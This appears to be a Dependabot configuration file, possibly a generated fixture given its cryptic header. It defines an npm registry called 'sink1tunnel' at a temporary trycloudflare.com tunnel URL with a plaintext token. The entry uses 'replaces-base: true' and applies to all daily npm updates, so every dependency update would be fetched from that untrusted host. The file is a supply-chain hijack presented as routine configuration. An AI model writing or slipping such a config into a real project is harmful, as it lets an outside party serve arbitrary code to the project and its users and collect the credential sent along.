# p13 p5d2_5d_ctrl_token 1790610730
version: 2
registries:
  sink1tunnel:
    type: npm-registry
    url: https://rand-terms-bytes-subsidiaries.trycloudflare.com/redirc/ctrl
    token: "plainliteral123"
    replaces-base: true
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule: {interval: "daily"}
    registries: "*"
